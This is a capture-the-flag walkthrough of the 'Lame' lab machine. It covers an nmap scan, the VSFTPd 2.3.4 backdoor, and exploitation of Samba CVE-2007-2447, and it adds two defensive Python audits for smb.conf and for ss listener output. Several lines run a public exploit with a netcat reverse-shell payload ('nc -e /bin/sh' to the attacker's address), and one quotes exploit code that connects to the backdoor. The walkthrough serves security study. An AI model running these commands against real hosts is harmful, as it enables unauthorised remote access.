Run a quick nmap scan
How many of the nmap top 1000 TCP ports are open on the remote host? 4
What version of VSFTPd is running on Lame? 2.3.4
There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here? no
https://www.exploit-db.com/exploits/49757
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
What version of Samba is running on Lame? Give the numbers up to but not including "-Debian". 3.0.20
To enumerate the Samba version, let's run an nmap scan with specific flags.
We will try listing SMB shares using anonymous login - it worked.
What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf? CVE-2007-2447
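CVE-2007-2447 only matters when "username map script" is set, so the first thing a defender checks on an old Samba host is the configuration itself. As an added example (not part of this writeup or of the exploit repository it links to), here is a small Python audit that parses an smb.conf and flags that parameter. The sample configuration is constructed for the example, not taken from Lame; the parser relies on the smb.conf(5) rules that parameter names are case-insensitive with internal whitespace ignored, that only the first "=" is significant, and that lines starting with ";" or "#" are comments.

```python
import re

# Constructed sample smb.conf (not Lame's): the risky option is set in [global].
SAMPLE_WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   Username Map Script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   read only = no
"""

# The same file with the option commented out, which is the usual fix when
# the mapping script is not actually needed.
SAMPLE_FIXED_CONF = SAMPLE_WEAK_CONF.replace(
    "   Username Map Script", "   ; Username Map Script")


def parse_smb_conf(text):
    """Return {section: {normalized_parameter: value}} for smb.conf-style text.

    Samba ignores case and whitespace in parameter names, so "Username Map Script"
    and "username map script" are normalized to the same key "usernamemapscript".
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")  # only the first '=' matters
            norm = re.sub(r"\s+", "", key).lower()
            sections[current][norm] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return (section, parameter, value) findings for risky settings.

    An empty value disables "username map script", so only non-empty values
    are reported.
    """
    findings = []
    for section, params in parse_smb_conf(text).items():
        value = params.get("usernamemapscript", "")
        if value:
            findings.append((section, "username map script", value))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", SAMPLE_WEAK_CONF), ("fixed", SAMPLE_FIXED_CONF)):
        hits = audit_smb_conf(conf)
        print(f"{label}: {hits if hits else 'no risky parameters found'}")
```

Run it against `/etc/samba/smb.conf` on a host you administer by reading the file into `audit_smb_conf`; a hit on a Samba 3.0.20-era build is the configuration precondition this writeup's exploit depends on, and the remediation is to remove the parameter or upgrade Samba.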
We will use the exploit https://github.com/Ziemni/CVE-2007-2447-in-Python
Solution 1: Use a Python Virtual Environment
You can create a Python virtual environment to install pysmb without modifying the system Python installation.
- Create a virtual environment:
python3 -m venv ~/venv/pysmb-env
- Activate the virtual environment:
source ~/venv/pysmb-env/bin/activate
- Install pysmb within the virtual environment:
pip install pysmb
- Run your script. Now that the environment is set up, run your smbExploit.py script:
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
To exit the virtual environment later, you can simply type:
deactivate
Solution 2: Use pipx to Install pysmb
pipx allows you to install Python packages in isolated environments and run them easily.
- Install pipx:
sudo apt install pipx
- Install pysmb using pipx:
pipx install pysmb
- Run your script. Since pipx manages the dependencies, you should be able to run smbExploit.py without issues:
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We will stick with the first solution (remember to set up a listener on port 443).
python3 -m venv ~/venv/pysmb-env
source ~/venv/pysmb-env/bin/activate
pip install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We caught the reverse shell.
We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones bound to 0.0.0.0 and to the box's external IP, so they should be reachable from outside. What must be blocking connections to these ports? firewall
When the VSFTPd backdoor is triggered, what port starts listening? 6200
If we look closely at the exploit from https://www.exploit-db.com/exploits/49757, we see that it connects to the backdoor on port 6200:
# excerpt from the exploit-db script: second connection to the backdoor listener
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
We will run the exploit and check. This time, we will use Metasploit.
On the reverse shell we caught earlier, we will run ss -ntplu.
The ss -ntplu command is used to display information about network connections in Linux, including both TCP and UDP listening ports. Here's what each flag stands for:
-n: Show numerical addresses instead of resolving hostnames.
-t: Display TCP sockets.
-p: Show the processes using the sockets.
-l: Show only listening sockets.
-u: Display UDP sockets.
When you run this command, it will display a list of all the TCP and UDP listening sockets along with the associated processes.
As highlighted, we can see that port 6200 starts listening on Lame.
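The two observations above (more listeners on the host than the external scan saw, and a new vsftpd-owned listener on 6200) are exactly what a defender wants to spot automatically. As an added example that is not part of this writeup, here is a Python parser for `ss -ntplu` output that lists externally bound TCP listeners the outside scan did not report (so they are either filtered by a firewall or appeared after the scan) and names the process holding a given port. The `ss` output, the pids and the extra services are constructed for the example; 10.129.5.9 is just the target address from this writeup, and the set of externally open ports is an assumption since the page does not list them. The parser assumes the column layout of current iproute2 `ss`; older builds may print columns differently.

```python
import re
from collections import namedtuple

Socket = namedtuple("Socket", "proto state addr port process")

# Constructed `ss -ntplu` output (not Lame's real output). Pids, fds and the
# postgres/mysqld entries are made up; 10.129.5.9 is the writeup's target address.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0           0.0.0.0:68         0.0.0.0:*     users:(("dhclient",pid=611,fd=6))
tcp   LISTEN 0      128         0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=1201,fd=3))
tcp   LISTEN 0      32          0.0.0.0:21         0.0.0.0:*     users:(("vsftpd",pid=4407,fd=4))
tcp   LISTEN 0      1           0.0.0.0:6200       0.0.0.0:*     users:(("vsftpd",pid=4421,fd=5))
tcp   LISTEN 0      50       10.129.5.9:139        0.0.0.0:*     users:(("smbd",pid=4510,fd=20))
tcp   LISTEN 0      50       10.129.5.9:445        0.0.0.0:*     users:(("smbd",pid=4510,fd=21))
tcp   LISTEN 0      128         0.0.0.0:5432       0.0.0.0:*     users:(("postgres",pid=4602,fd=7))
tcp   LISTEN 0      128       127.0.0.1:3306       0.0.0.0:*     users:(("mysqld",pid=4700,fd=10))
tcp   LISTEN 0      128            [::]:22            [::]:*     users:(("sshd",pid=1201,fd=4))
"""

# Ports the external nmap scan reported open: an assumed set for this example.
EXTERNALLY_OPEN_PORTS = {21, 22, 139, 445}

LOOPBACK_PREFIXES = ("127.", "[::1]")
PROCESS_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_ss(output):
    """Parse `ss -ntplu` output into Socket records; the header line is skipped."""
    sockets = []
    for line in output.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 6 or fields[0] not in ("tcp", "udp"):
            continue
        # rpartition keeps "[::]:22" and "*:22" working as well as "0.0.0.0:22"
        addr, _, port = fields[4].rpartition(":")
        process = fields[6] if len(fields) > 6 else ""
        match = PROCESS_RE.search(process)
        name = match.group(1) if match else "?"
        sockets.append(Socket(fields[0], fields[1], addr, int(port), name))
    return sockets


def is_external(sock):
    """True when the socket is bound to anything other than a loopback address."""
    return not sock.addr.startswith(LOOPBACK_PREFIXES)


def listening_tcp(sockets):
    return [s for s in sockets if s.proto == "tcp" and s.state == "LISTEN"]


def unexpected_listeners(sockets, expected_ports):
    """Externally bound TCP listeners that the outside scan did not report.

    Each hit is either filtered by a host or network firewall (the scanner could
    not reach it) or appeared after the scan, as a backdoor listener would.
    Returns sorted unique (port, process) pairs.
    """
    hits = {(s.port, s.process)
            for s in listening_tcp(sockets)
            if is_external(s) and s.port not in expected_ports}
    return sorted(hits)


def processes_on_port(sockets, port):
    """Names of processes holding a TCP listener on `port`."""
    return sorted({s.process for s in listening_tcp(sockets) if s.port == port})


if __name__ == "__main__":
    socks = parse_ss(SAMPLE_SS_OUTPUT)
    for port, proc in unexpected_listeners(socks, EXTERNALLY_OPEN_PORTS):
        print(f"listening but not seen from outside: {port}/tcp ({proc})")
    print("owner of 6200/tcp:", processes_on_port(socks, 6200))
```

On a real host, feed the captured `ss -ntplu` text into `parse_ss` and the port list from your own authorized scan into `unexpected_listeners`; a vsftpd-owned listener on 6200 is the indicator this writeup demonstrates, and a long list of other hits is the sign that a firewall is hiding services from the network rather than that they are absent.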